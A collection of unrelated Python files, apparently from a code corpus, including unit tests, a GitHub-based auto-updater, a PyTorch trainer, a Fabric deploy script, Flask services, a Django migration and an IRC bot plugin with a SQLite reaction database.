self.assertEqual('*name', self.post.info_list(False))
def test_info_list_not_changed_long(self):
self.fill_post()
self.post.changed = False
with self.mocker:
self.assertEqual(dedent("""\
name
title: Post Title
link: link
slug: name
labels: a, b
postid: postid
published: None
updated: None
localstamp: None"""), self.post.info_list(True))
def test_info_list_changed_long(self):
self.fill_post()
self.post.changed = True
with self.mocker:
self.assertEqual(dedent("""\
*name
title: Post Title
link: link
slug: name
labels: a, b
postid: postid
published: None
updated: None
localstamp: None"""), self.post.info_list(True))
|
#!/bin/python
# Script updater.py
# Check update for application to the latest version
import urllib.request as request
import os.path as path
import os
import ctypes
import logging
# define
OK = 1
NOK = 0
htpdir = path.abspath(path.join(os.getcwd(), '../../..'))
log_file = path.join(htpdir + '\\log','updater.log')
os.makedirs(os.path.dirname(log_file), exist_ok=True)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# Create handler
handler = logging.FileHandler(log_file, mode='w')
handler.setLevel(logging.INFO)
# Create logging format
formatter = logging.Formatter('%(asctime)s %(levelname)s : %(message)s')
handler.setFormatter(formatter)
# Add handler to logger
logger.addHandler(handler)
def remove_dot(input):
ori = input
rem = ori.replace('.','')
return rem
def get_local_version():
res = ''
file = path.join(os.getcwd(),'update')
with open(file,'r') as read:
res = read.readline()
trim = str(res).rstrip('\r\n')
trunc = trim[15:]
return remove_dot(trunc)
def compare_version(local,remote):
logger.info("Current Local version [%s]" % local)
logger.info("Latest Remote version [%s]" % remote)
needUpdate = 0
if(local == remote):
needUpdate = 0
logger.info("No update. Application has the latest version")
if(local < remote):
needUpdate = 1
logger.info("Require update to the latest version")
return needUpdate
def get_remote_version():
res = request.urlopen('https://raw.githubusercontent.com/hafizhamdi/updater/master/update.txt')
line = res.readline()
sres = str(line, 'utf-8').strip()
ver = sres[14:]
return remove_dot(ver)
def confirm(local, remote):
MessageBox = ctypes.windll.user32.MessageBoxW
return MessageBox(None, 'Current v%s. Confirm download the latest patches v%s?' % (local, remote ), 'Confirm', 1)
def padzero(version):
return str(version).zfill(5)
def backup():
import subprocess as p
sts = NOK
try:
bindir = path.abspath(path.join(os.getcwd(),'../..'))
bkpscr = path.join(bindir, 'backup.bat')
p.call([bkpscr,'/b'])
logger.info("Backup files... success")
sts = OK
except:
logger.error("Backup files error")
sts = NOK
finally:
return sts
def download(version):
import requests,zipfile,io
sts = NOK
try:
patch = 'Patches/HFX' + padzero(version) + '/HISHTPService.zip'
url = 'https://github.com/hafizhamdi/updater/raw/master/' + patch
logger.info(url)
r = requests.get(url)
logger.info("Request return %s" % (r.ok))
z = zipfile.ZipFile(io.BytesIO(r.content))
cfolder = path.abspath(path.join(os.getcwd(), '../../../..'))
z.extractall(cfolder)
MessageBoxW = ctypes.windll.user32.MessageBoxW
MessageBoxW(None, 'Program has successfully updated', 'HISHTPService Updating...', 1)
sts = OK
except:
MessageBoxW = ctypes.windll.user32.MessageBoxW
MessageBoxW(None, 'Updating Error', 'Updating...', 1)
sts = NOK
finally:
return sts
def append_dot(version):
res = ''
for i in range(len(version)):
res += version[i] + '.'
return res[:-1]
def update_localv(ver):
try:
with open('update','w') as f:
f.write('CurrentVersion:' + append_dot(ver))
logger.info("Updating local version %s success" % (ver))
except:
logger.error("Updating local version failed.")
def stop_services():
import subprocess as p
sts = NOK
try:
bindir = path.abspath(path.join(os.getcwd(),'../..'))
stopscr = path.join(bindir, 'stop_services.bat')
p.call([bkpscr])
logger.info("Stop services... success")
sts = OK
except:
logger.error("Stop services error")
sts = NOK
finally:
return sts
remote = get_remote_version()
local = get_local_version()
if 1 == compare_version(local,remote):
#print(confirm())
if 1 == confirm(local,remote):
ss = stop_services() # Stop running services HISHTP Service and Print Watcher
if OK == backup(): # Backup data to bkp under C directory
if OK == download(remote): # Check downloading
update_localv(remote) # Sucess, update local version |
wordcount={}
c = 0
x = ''
with open('dataset_3363_3.txt') as inf:
for line in inf:
line = line.strip()
for word in line.lower().split():
if word not in wordcount:
wordcount[word] = 1
else:
wordcount[word] += 1
for k,v in sorted(wordcount.items()):
if v > c:
c = v
x = k
print(x, c) |
from torch.utils.data import DataLoader
from parseridge.corpus.training_data import ConLLDataset
from parseridge.parser.loss import Criterion
from parseridge.parser.training.base_trainer import Trainer
from parseridge.parser.training.callbacks.base_callback import StopEpoch, StopTraining
from parseridge.parser.training.hyperparameters import Hyperparameters
class StaticTrainer(Trainer):
"""
This trainer uses pre-generated training samples.
"""
def fit(
self,
epochs: int,
training_data: ConLLDataset,
hyper_parameters: Hyperparameters = None,
**kwargs,
) -> None:
if not isinstance(training_data, ConLLDataset):
raise ValueError(
f"The StaticTrainer requires a ConLLDataset object for training, but "
f"received a {type(training_data)} object."
)
hyper_parameters = (hyper_parameters or Hyperparameters()).update(**kwargs)
initial_epoch = self.last_epoch
self.callback_handler.on_train_begin(
epochs=epochs + initial_epoch, hyper_parameters=hyper_parameters
)
for epoch in range(initial_epoch + 1, epochs + initial_epoch + 1):
try:
self._run_epoch(epoch, training_data, hyper_parameters)
except StopTraining:
self.logger.info(f"Stopping training after {epoch} epochs.")
break
self.callback_handler.on_train_end()
def _run_epoch(
self, epoch: int, training_data: ConLLDataset, hyper_parameters: Hyperparameters
):
train_dataloader = DataLoader(
dataset=training_data,
batch_size=hyper_parameters.batch_size,
shuffle=True,
collate_fn=ConLLDataset.collate_batch,
)
num_batches = int(len(training_data) / hyper_parameters.batch_size)
self.callback_handler.on_epoch_begin(
epoch=epoch, num_batches=num_batches, training_data=training_data
)
criterion = Criterion(loss_function=hyper_parameters.loss_function)
epoch_loss = 0
for i, batch_data in enumerate(train_dataloader):
try:
self.callback_handler.on_batch_begin(batch=i, batch_data=batch_data)
batch = ConLLDataset.TrainingBatch(*batch_data)
pred_transitions, pred_relations = self.model(
stacks=batch.stacks,
stack_lengths=batch.stack_lengths,
buffers=batch.buffers,
buffer_lengths=batch.buffer_lengths,
token_sequences=batch.sentences,
sentence_lengths=batch.sentence_lengths,
)
# Compute loss. Depending on the chosen loss strategy only a part of the
# arguments will actually be used in the computations of the loss value.
loss = criterion(
pred_transitions=pred_transitions,
gold_transitions=batch.gold_transitions,
pred_relations=pred_relations,
gold_relations=batch.gold_relations,
wrong_transitions=batch.wrong_transitions,
wrong_transitions_lengths=batch.wrong_transitions_lengths,
wrong_relations=batch.wrong_relations,
wrong_relations_lengths=batch.wrong_relations_lengths,
)
self.learn(loss)
loss = loss.item()
epoch_loss += loss
self.last_epoch = epoch
self.callback_handler.on_batch_end(
batch=i, batch_data=batch_data, batch_loss=loss
)
except StopEpoch:
self.logger.info(f"Stopping epoch after {i}/{num_batches} batches.")
break
self.callback_handler.on_epoch_end(epoch=epoch, epoch_loss=epoch_loss)
|
class Store:
store_name = None
store_sale = {}
def generate_Report(self,store_name=None):
if store_name is None:
print('provide the store(name) of the you want the { Generate_Report }')
else:
|
#!/usr/bin/env python
# coding: utf-8
# In[2]:
def printAll(*args): # All the arguments are 'packed' into args which can be treated like a tuple
print("No of arguments:", len(args))
for argument in args:
print(argument)
#printAll with 3 arguments
printAll('Horsefeather','Adonis','Bone')
#printAll with 4 arguments
printAll('Sidecar','Long Island','Mudslide','Carriage')
# In[3]:
def printer(*args):
print('there are ', len(args), ' arguements')
printer('Horsefeather','Adonis','Bone')
# In[36]:
def printDictionary(**args):
print(args)
for k in args:
print(k )
printDictionary(Country='Canada',Province='Ontario',City='Toronto')
# Come up with a function that divides the first input by the second input:
#
# In[26]:
def divider(a,b):
print(int(a/b))
divider(10,2)
# In[27]:
# Use the con function for the following question
def con(a, b):
return(a + b)
# In[28]:
con(2,2)
# In[30]:
con('a','b')
# In[34]:
con(('1'),('2'))
# You have been tasked with creating a lab that demonstrates the basics of probability by simulating a bag filled with colored balls. The bag is represented using a dictionary called "bag", where the key represents the color of the ball and the value represents the no of balls. The skeleton code has been made for you, do not add or remove any functions. Complete the following functions -
#
# fillBag - A function that packs it's arguments into a global dictionary "bag".
# totalBalls - returns the total no of balls in the bucket
# probOf - takes a color (string) as argument and returns probability of drawing the selected ball. Assume total balls are not zero and the color given is a valid key.
# probAll - returns a dictionary of all colors and their corresponding probability
# In[46]:
def fillBag(**specs):
global bag
bag = specs
def totalBalls():
return sum(bag.values())
def probOf(color):
return (bag[color]/totalBalls())
def probAll():
for i in bag:
print(i, " : ", prob(i))
# In[49]:
testBag = dict(red = 12, blue = 20, green = 14, grey = 10)
dictCasting = dict(a = 1, b =2, c=3)
print(dictCasting)
total = sum(testBag.values())
prob={}
for color in testBag:
prob[color] = testBag[color]/total;
def testMsg(passed):
if passed:
return 'Test Passed'
else :
return ' Test Failed'
print("fillBag : ")
try:
fillBag(**testBag)
print(testMsg(bag == testBag))
except NameError as e:
print('Error! Code: {c}, Message: {m}'.format(c = type(e).__name__, m = str(e)))
except:
print("An error occured. Recheck your function")
print("totalBalls : ")
try:
print(testMsg(total == totalBalls()))
except NameError as e:
print('Error! Code: {c}, Message: {m}'.format(c = type(e).__name__, m = str(e)))
except:
print("An error occured. Recheck your function")
print("probOf")
try:
passed = True
for color in testBag:
if probOf(color) != prob[color]:
passed = False
print(testMsg(passed) )
except NameError as e:
print('Error! Code: {c}, Message: {m}'.format(c = type(e).__name__, m = str(e)))
except:
print("An error occured. Recheck your function")
print("probAll")
try:
print(testMsg(probAll() == prob))
except NameError as e:
print('Error! Code: {c}, Message: {m}'.format(c = type(e).__name__, m = str(e)))
except:
print("An error occured. Recheck your function")
# In[ ]:
|
import shutil
from unittest import TestCase
from segmentation_rt.rs2mask.dcm2mask import Dataset
TEST_IPP = 'tests/test_data/cheese_dcm'
TEST_RS = 'tests/test_data/cheese_dcm/cheese_dcm_1/RS1.2.752.243.1.1.20210208111802158.1580.88111.dcm'
class TestDataset(TestCase):
def setUp(self):
structures = ['External', 'max', 'missing']
root = TEST_IPP
name = "dataset_cheese"
self.dataset = Dataset(root, name, structures)
def tearDown(self):
shutil.rmtree(self.dataset.path_dataset, ignore_errors=True)
def test_get_rs(self):
rs_paths = self.dataset.get_rs()
self.assertEqual([TEST_RS], rs_paths)
def test_find_structures(self):
missing, not_missing = self.dataset.find_structures(0)
self.assertEqual(len(missing), 1)
self.assertEqual(['External', 'max'], list(not_missing))
|
def main():
run()
a = A(1)
def run():
print("I am running")
class A(object):
def __init__(self, arg):
pass
if __name__ == '__main__':
main()
|
from google.appengine.ext import ndb
from models.AppUserModel import AppUserMethods
import datetime
from models.TaskboardModel import TaskboardMethods
class Task(ndb.Model):
# taskboard task belongs to
taskboard = ndb.KeyProperty()
# title of task
title = ndb.StringProperty()
# description of task
description = ndb.TextProperty()
# due_date of task
due_date = ndb.DateTimeProperty()
# AppUser task is assigned to
assigned_to = ndb.KeyProperty()
# Task if completed or not
status = ndb.BooleanProperty()
# User who created task
created_by = ndb.KeyProperty()
# date when task was created
created_date = ndb.DateTimeProperty(auto_now=True)
# date when task was updated
updated_date = ndb.DateTimeProperty(auto_now=True)
# completion date when task was mark completed
completed_date = ndb.DateProperty()
class TaskMethods:
def __init__(self):
pass
@staticmethod
def task_to_dictionary(task):
return {
'id': task.key.id(),
'taskboard_id': task.taskboard.id(),
'title': task.title,
'description': task.description,
'due_date': task.due_date.strftime('%Y-%m-%d'),
'due_date_text': str((
task.due_date - datetime.datetime.now()).days) + ' days remaining' if task.due_date > datetime.datetime.now() else str(
(datetime.datetime.now() - task.due_date).days) + ' days overdue',
'overdue': task.due_date < datetime.datetime.now(),
'assigned_to_email': task.assigned_to.get().email if task.assigned_to else 'unassigned',
'assigned_to': task.assigned_to.get().key.id() if task.assigned_to else None,
'status': task.status,
'status_text': 'completed' if task.status else 'ongoing',
'created_by': task.created_by.get().email,
'created_date': task.created_date.strftime('%Y-%m-%d'),
'updated_date': task.updated_date.strftime('%Y-%m-%d'),
'creator': task.created_by.get().email == AppUserMethods.get_current_user().email,
'completed_date': task.completed_date.strftime('%Y-%m-%d') if task.completed_date else None,
'completed_date_text': (str((
task.due_date.date() - task.completed_date).days) + ' days before due' if task.due_date.date() > task.completed_date else str(
(task.completed_date - task.due_date.date()).days) + ' days after due') if task.completed_date else None
}
@staticmethod
def get_all_tasks():
return Task.query().fetch()
@staticmethod
def get_all_tasks_by_taskboard(taskboard_id):
taskboard_id = int(str(taskboard_id).strip())
taskboard_key = TaskboardMethods.get_by_id(taskboard_id).key
return Task.query(Task.taskboard == taskboard_key).fetch()
@staticmethod
def get_all_tasks_by_taskboard_and_member(taskboard_id, app_user_id):
taskboard_id = int(str(taskboard_id).strip())
app_user_id = int(str(app_user_id).strip())
taskboard_key = TaskboardMethods.get_by_id(taskboard_id).key
app_user_key = AppUserMethods.get_user_key(app_user_id)
return Task.query(Task.taskboard == taskboard_key).filter(Task.assigned_to == app_user_key).fetch()
@staticmethod
def get_by_id(id):
id = int(str(id).strip())
return Task.get_by_id(id)
@staticmethod
def exists_task(title, id=False):
# check if task with same title exists
title = title.strip()
task = Task.query(Task.title == title)
if id:
id = int(str(id).strip())
task = task.filter(Task.key != ndb.Key(Task, id))
if task:
task = task.get()
return bool(task)
@staticmethod
def update_task(id, title, description, due_date, assigned_to, status):
id = int(str(id).strip())
title = title.strip()
# get task by id
task = Task.get_by_id(id)
# set new post data
task.title = title.strip()
task.description = description.strip()
task.due_date = datetime.datetime.strptime(due_date.strip(), '%Y-%m-%dT%H:%M:%S.%fZ')
task.assigned_to = AppUserMethods.get_user_key(int(assigned_to))
task.status = bool(status)
task.updated_date = datetime.datetime.now()
# if task's status if completed set completed date as today
if task.status:
task.completed_date = datetime.date.today()
else:
task.completed_date = None
if not TaskMethods.exists_task(title, id):
task.put()
else:
task = False
return task
@staticmethod
def insert_task(taskboard_id, title, description, due_date, assigned_to):
task = Task()
task.taskboard = TaskboardMethods.get_by_id(taskboard_id).key
task.title = title.strip()
task.description = description.strip()
task.due_date = datetime.datetime.strptime(due_date.strip(), '%Y-%m-%dT%H:%M:%S.%fZ')
task.assigned_to = AppUserMethods.get_user_key(int(assigned_to))
task.status = False
task.updated_date = datetime.datetime.now()
task.created_date = datetime.datetime.now()
task.completed_date = None
task.created_by = AppUserMethods.get_current_user().key
if not TaskMethods.exists_task(title):
task.put()
else:
task = False
return task
@staticmethod
def put_task(taskboard_id, title, description, due_date, assigned_to, status=None, id=None):
return TaskMethods.update_task(id, title, description, due_date, assigned_to, status) if id \
else TaskMethods.insert_task(taskboard_id, title, description, due_date, assigned_to)
@staticmethod
def delete_task(id):
id = int(str(id).strip())
key = ndb.Key(Task, id)
if key:
return key.delete()
else:
return False
@staticmethod
def unassign_tasks(tasks):
for task in tasks:
task.assigned_to = None
task.put()
return True
@staticmethod
def mark_as_complete(task_id):
task = TaskMethods.get_by_id(int(task_id))
task.status = True
task.completed_date = datetime.date.today()
task.put()
return task
@staticmethod
def mark_as_ongoing(task_id):
task = TaskMethods.get_by_id(int(task_id))
task.status = False
task.completed_date = None
task.put()
return task
@staticmethod
def get_open_tasks_count(taskboard):
# open tasks count is count of tasks in board with status = false
return Task.query(Task.taskboard == taskboard.key).filter(Task.status == False).count(100)
@staticmethod
def get_closed_tasks_count(taskboard):
# closed task count is count of tasks in board with status true
return Task.query(Task.taskboard == taskboard.key).filter(Task.status == True).count()
@staticmethod
def get_total_tasks_count(taskboard):
# total task count is count of total tasks in taskboard
return Task.query(Task.taskboard == taskboard.key).count()
pass
@staticmethod
def get_closed_today_tasks_count(taskboard):
# closed today tasks count is count of total tasks closed today
return Task.query(Task.taskboard == taskboard.key).filter(Task.status == True).filter(Task.completed_date == datetime.date.today()).count()
pass
|
#!/usr/bin/python3
"""Fabric script (based on the file 1-pack_web_static.py) that
distributes an archive to your web servers, using the function do_deploy:"""
from fabric.api import *
import time
from os import path
env.hosts = ['35.237.41.190', '3.90.183.111']
def do_deploy(archive_path):
if path.isfile(archive_path) is False:
return False
try:
name = archive_path[9:-4]
print(name)
put(archive_path, "/tmp/" + name + ".tgz")
host_path = "/data/web_static/releases/" + name + "/"
run("mkdir -p " + host_path)
run("tar -xzf /tmp/" + name + ".tgz -C " + host_path)
run("rm /tmp/" + name + ".tgz")
run("mv /data/web_static/releases/" + name +
"/web_static/* " + host_path)
run("rm -rf " + host_path + "web_static")
run("rm -rf /data/web_static/current")
run("ln -s " + host_path + " /data/web_static/current")
print("New version deployed!")
return True
except:
return False
|
import smtplib, ssl
from datetime import datetime, timezone
from flask import Flask
from flask_restx import Api, Resource, fields
from werkzeug.middleware.proxy_fix import ProxyFix
from config import Config, log
app = Flask(__name__)
app.wsgi_app = ProxyFix(app.wsgi_app)
api = Api(app, version='1.0', title='SMTP API Gateway',
description='A simple API gateway to send email messages over SMTP service in Gmail',)
ns = api.namespace('mail', description='mail operations')
message = api.model('Message', {
'id': fields.Integer(readonly=True, description='Message unique identifier'),
'to': fields.String(required=True, description='Recipient email address'),
'subject': fields.String(required=True, description='Email subject'),
'body': fields.String(required=False, description='Email body (optional)'),
'timestamp': fields.DateTime(readonly=True)
})
class MessageDAO(object):
def __init__(self):
self.counter = 1
self.messages = []
def get(self, id):
for message in self.messages:
if message['id'] == id:
return message
api.abort(404, f'Message with id: {id} does not exist')
def create(self, data):
message = data
message['id'] = self.counter = self.counter + 1
message['timestamp'] = datetime.isoformat(datetime.now(tz=timezone.utc))
self.messages.append(message)
return message
DAO = MessageDAO()
@ns.route('/')
class Mail(Resource):
@ns.doc('list_messages')
def get(self):
"""List all messages sent"""
return DAO.messages
@ns.doc('send_message')
@ns.expect(message)
def post(self):
"""Send new SMTP message"""
data = api.payload
message = f'Subject: {data["subject"]}\n\n{data["body"]}'
try:
server = smtplib.SMTP(Config.smtp_server, Config.smtp_port)
server.ehlo()
if Config.use_starttls:
context = ssl.create_default_context()
server.starttls(context=context)
server.ehlo()
if Config.smtp_password:
server.login(Config.smtp_username, Config.smtp_password)
server.sendmail(Config.from_email, data['to'], message)
except Exception as e:
log.error(f'mail send failed with error: {e}')
api.abort(500, f'mail send failed with error: {e}')
finally:
server.quit()
DAO.create(data)
return {'status': 'ok'}
if __name__ == '__main__':
app.run(debug=Config.debug, host='0.0.0.0')
|
#!/usr/bin/env python
# Authors: Trevor Sherrard,
# Since: 02/10/2020
# Project: RIT MSD P20250 Finger Lakes ROV Exploration
# filename: flask_node.py
# import required libraries
import rospy
import time
import threading
from std_msgs.msg import Float32MultiArray
from std_msgs.msg import Int8
from flask import Flask
from flask_cors import CORS
app = Flask(__name__)
CORS(app)
# declare and initialize global variable
global imuData
imuData = [0,0,0,0,0,0,0,0,0]
global VertMotionSpeed, rotationSpeed, HoriMotionSpeed
VertMotionSpeed, HoriMotionSpeed, rotationSpeed = (0, 0, 0)
global cruiseControlEnabled, lightSetting, AButtonState
cruiseControlEnabled, lightSetting, AButtonState = (0, 0, 0)
def imuDataCallback(msg):
global imuData
imuData = msg.data
def buttonStateCallback(msg):
global AButtonState
AButtonState = msg.data
def lightSettingCallback(msg):
global lightSetting
lightSetting = msg.data
def VertMotionSpeedCallback(msg):
global VertMotionSpeed
VertMotionSpeed = msg.data
def HoriMotionSpeed(msg):
global HoriMotionSpeed
HoriMotionSpeed = msg.data
def rotationSpeedCallback(msg):
global rotationSpeed
rotationSpeed = msg.data
def cruiseControlCallback(msg):
global cruiseControlEnabled
cruiseControlEnabled = msg.data
@app.route("/imu")
def imuDataFlask():
global imuData
now = rospy.get_time()
return str(now) + "!" + str(imuData)
@app.route("/missiondata")
def missionDataFlask():
now = rospy.get_time()
global lightSetting
temp = "70"
depth = "250"
pressure = "7470"
strToReturn = str(now) + "!"+ temp + "!" + depth + "!" + pressure + "!"
return strToReturn
@app.route("/motiondata")
def motionDataFlask():
now = rospy.get_time()
global VertMotionSpeed, rotationSpeed, HoriMotionSpeed
strToReturn = str(now) + "!" + str(VertMotionSpeed) + "!" + str(rotationSpeed) + "!" + str(HoriMotionSpeed)
return strToReturn
@app.route("/misccmddata")
def miscCommandsFlask():
now = rospy.get_time()
global cruiseControlEnabled, AButtonState
strToReturn = str(now) + "!" + str(cruiseControlEnabled) + "!" + AButtonState
return strToReturn
def main():
# init node
threading.Thread(target=lambda: rospy.init_node('flask_node', disable_signals=True)).start()
print("node initalized...")
# start subscribing to imu data
rospy.Subscriber("/imu_data", Float32MultiArray, imuDataCallback)
rospy.Subscriber("/AButtonState", Int8, buttonStateCallback)
rospy.Subscriber("/LightSetting", Int8, lightSettingCallback)
rospy.Subscriber("/VertMotionSpeed", Int8, VertMotionSpeedCallback)
rospy.Subscriber("/HorizontalMotionSpeed", Int8, HoriMotionSpeed)
rospy.Subscriber("/rotationSpeed", Int8, rotationSpeedCallback)
rospy.Subscriber("/cruiseEnabled", Int8, cruiseControlCallback)
print("began subscribing to data ...")
app.run(host="0.0.0.0", port=5000)
if __name__ == "__main__":
main()
|
import csv, sys, os
if len(sys.argv) != 2:
print "Usage: python %s <spreadsheet.csv>" % os.path.basename(__file__)
sys.exit(0)
filename = sys.argv[1]
print "---Battle Tower CSV Parser---"
print " version 0.0.3 "
print
print "Loading " + filename + "..."
print
#list to store the items
floors = [None] * 10
with open(filename, 'r') as chart:
#filter out commented lines (start with #)
reader = csv.reader(filter(lambda row: row[0]!='#', chart))
#get the names of each floor (because i'm lazy)
floor_names = next(reader)
#initialize floors
for i, name in enumerate(floor_names):
floors[i] = []
#iterate over csv and add items to table
for row in reader:
for i, item in enumerate(row):
if len(item) > 0:
floors[i].append(item)
print "Preparing Config File..."
config = open("config.txt", "w")
config.write("battletowerchestitems {\n")
for i in range(0,9):
config.write(' ')
config.write('S:"Floor %s"=' % str(i+1))
for item in floors[i]:
config.write(item)
config.write(';')
config.write('\n')
config.write(' S:"Top Floor"=')
for item in floors[9]:
config.write(item)
config.write(';')
config.write('\n}')
print "done!"
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-08 13:01
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('recursos', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Agendamento',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='ChefeDeDepartamento',
fields=[
('usuario_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='recursos.Usuario')),
],
bases=('recursos.usuario',),
),
migrations.CreateModel(
name='Funcionario',
fields=[
('usuario_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='recursos.Usuario')),
],
bases=('recursos.usuario',),
),
migrations.CreateModel(
name='Recurso',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AddField(
model_name='usuario',
name='isChefe',
field=models.BooleanField(default=False),
),
]
|
from django.urls import path, include
urlpatterns = [
path('', include('api.users.urls', namespace='users')),
path('', include('api.menu.urls', namespace='menus')),
path('', include('api.orders.urls', namespace='orders')),
path('', include('api.token.urls', namespace='token')),
] |
###
# Copyright (c) 2009-2014, Torrie Fischer
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.utils as utils
import supybot.world as world
from supybot.commands import *
import supybot.irclib as irclib
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.schedule as schedule
import supybot.callbacks as callbacks
import random
import time
import re
import sqlite3
import functools
import Queue
import threading
import logging
class QuietNestedCommandsIrcProxy(callbacks.NestedCommandsIrcProxy):
def __init__(self, *args, **kwargs):
self.savedReply = None
super(QuietNestedCommandsIrcProxy, self).__init__(*args, **kwargs)
def getCommandHelp(self, command, simpleSyntax=None):
return ""
def reply(self, s, msg=None, **kwargs):
if msg is None:
msg = self.msg
self.savedReply = s
self.noReply()
def replyError(self, *args, **kwargs):
self.noReply()
def replySucces(self, *args, **kwargs):
self.noReply()
def _callCommand(self, command, irc, msg, *args, **kwargs):
self.log.info('%s called by %q.', callbacks.formatCommand(command), msg.prefix)
try:
for name in command:
cap = callbacks.checkCommandCapability(msg, self, name)
if cap:
return
try:
self.callingCommand = command
self.callCommand(command, irc, msg, *args, **kwargs)
finally:
self.callingCommand = None
except:
pass
class Promise(object):
def __init__(self):
self.event = threading.Event()
self.value = None
self.exception = None
def result(self):
logging.debug("Waiting to resolve promise")
self.event.wait()
logging.debug("Promise finished!")
if self.exception is not None:
raise self.exception
return self.value
def finish(self, val):
self.value = val
self.event.set()
def errored(self, exc):
self.exception = exc
self.event.set()
class ThreadProtectionFacade(object):
def __init__(self, wrappedClass, *args, **kwargs):
def f(*args, **kwargs):
return wrappedClass(*args, **kwargs)
self.__makeWrapped = f
self.__wrapEvent = threading.Event()
self.__jobs = Queue.Queue()
self.__thread = threading.Thread(target=self.__objThread)
self.__thread.start()
def __del__(self):
self._dispose()
def _dispose(self):
self.__jobs.put(None)
def __objThread(self):
self._wrapped = self.__makeWrapped()
self.__wrapEvent.set()
while True:
job = self.__jobs.get()
if job is None:
logging.debug("Quitting job thread")
return
func, promise = job
logging.debug("Processing job %r", func)
try:
promise.finish(func())
except Exception, e:
promise.errored(e)
def __schedule(self, func, *args, **kwargs):
p = Promise()
logging.debug("Scheduling %r", func)
self.__jobs.put((functools.partial(func, *args, **kwargs), p))
return p
def __getattr__(self, key):
self.__wrapEvent.wait()
val = getattr(self._wrapped, key)
if threading.currentThread() != self.__thread and callable(val):
@functools.wraps(val)
def schedule(*args, **kwargs):
return self.__schedule(val, *args, **kwargs)
return schedule
else:
return val
def regexp(expr, item):
reg = re.compile(expr)
logging.info("Matched %r against %r to get %r", expr, item, reg)
return reg.search(item) is not None
class SQLiteWhatisDB(object):
def __init__(self, filename):
self.dbs = ircutils.IrcDict()
self.filename = filename
def close(self):
for db in self.dbs.itervalues():
db.commit()
db.close()
def _getDb(self, channel):
if channel not in self.dbs:
filename = plugins.makeChannelFilename(self.filename, channel)
self.dbs[channel] = sqlite3.connect(filename)
self.dbs[channel].text_factory = str
c = self.dbs[channel].execute("PRAGMA user_version");
version = c.fetchone()[0]
self._upgradeDb(self.dbs[channel], version)
self.dbs[channel].create_function("REGEXP", 2, regexp)
return self.dbs[channel]
def _upgradeDb(self, db, current):
if (current == 0):
current=1
db.execute("CREATE TABLE Reactions (pattern TEXT KEY, reaction TEXT KEY, person TEXT, frequency REAL)")
db.execute("CREATE UNIQUE INDEX reactionPair ON Reactions (pattern, reaction)")
db.execute("PRAGMA user_version=%i"%current)
db.commit()
def getReactions(self, channel, pattern):
c = self._getDb(channel).cursor()
c.execute("SELECT reaction, pattern, person, frequency FROM Reactions WHERE pattern = ? ORDER BY reaction", (pattern,))
ret = []
for reaction in c:
ret.append({
'reaction': reaction[0],
'pattern': reaction[1],
'person': reaction[2],
'frequency': reaction[3]
})
return ret
def produceReaction(self, channel, text):
c = self._getDb(channel).cursor()
c.execute("SELECT reaction, pattern, person, frequency FROM Reactions WHERE REGEXP(pattern, ?) ORDER BY RANDOM() * frequency LIMIT 1", (text,))
res = c.fetchone()
if res:
return {
'reaction': res[0],
'pattern': res[1],
'person': res[2],
'frequency': res[3]
}
return None
def addReaction(self, channel, pattern, reaction, person=None, frequency=1):
if person is None:
person = "instinct"
c = self._getDb(channel).cursor()
try:
c.execute("INSERT OR ABORT INTO Reactions (pattern, reaction, person, frequency) VALUES (?, ?, ?, ?)", (pattern, reaction, person, frequency))
return True
except:
return False
def forgetReaction(self, channel, pattern, reaction):
c = self._getDb(channel).cursor()
res = c.execute("DELETE FROM Reactions WHERE pattern = ? AND reaction = ?",
(pattern,reaction))
self._getDb(channel).commit()
return bool(res.rowcount > 0)
WhatisDB = plugins.DB('Whatis', {'sqlite': SQLiteWhatisDB})
class Whatis(callbacks.PluginRegexp):
"""Add the help for "@plugin help Whatis" here
This should describe *how* to use this plugin."""
addressedRegexps = ['doRemember']
threaded = False
def __init__(self, irc):
self.__jobs = Queue.Queue()
self.__parent = super(Whatis, self)
self.__parent.__init__(irc)
self.db = ThreadProtectionFacade(WhatisDB)
self.explanations = ircutils.IrcDict()
def die(self):
self.__parent.die()
self.db.close()
self.db._dispose()
def explain(self, irc, msg, args, channel, text):
"""[<channel>] [<text>]
Returns the definition for <text> from the database for <channel>. If
text is not given, it returns the definition for the last reply.
"""
if (not text):
if (channel in self.explanations.keys()):
